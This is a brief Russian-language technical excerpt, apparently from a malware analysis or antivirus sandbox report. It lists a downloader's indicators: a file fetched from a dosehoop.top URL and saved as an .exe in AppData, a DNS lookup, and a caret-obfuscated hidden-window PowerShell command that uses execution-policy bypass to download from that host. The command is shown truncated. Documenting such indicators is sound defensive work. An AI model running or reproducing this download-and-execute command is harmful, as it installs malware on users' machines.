Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^W^Er^Sh^El^L.exe^ -ExEcuT^ionP^O^liCY ^bYPass -N^O^pr^ofIL^e^ -win^d^O^WS^tY^lE ^H^iDde^n ^(nEw-OB^jeC^t^ sy^St^Em.^n^et.WEB^cLi^E^n^t).dOwNLoaD^F^i^le^(^'http://dose...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /C "PO^W^Er^Sh^El^L.exe^ -ExEcuT^ionP^O^liCY ^bYPass -N^O^pr^ofIL^e^ -win^d^O^WS^tY^lE ^H^iDde^n ^(nEw-OB^jeC^t^ sy^St^Em.^n^et.WEB^cLi^E^n^t).dOwNLoaD^F^i^le^(^'http://dose...' (со скрытым окном)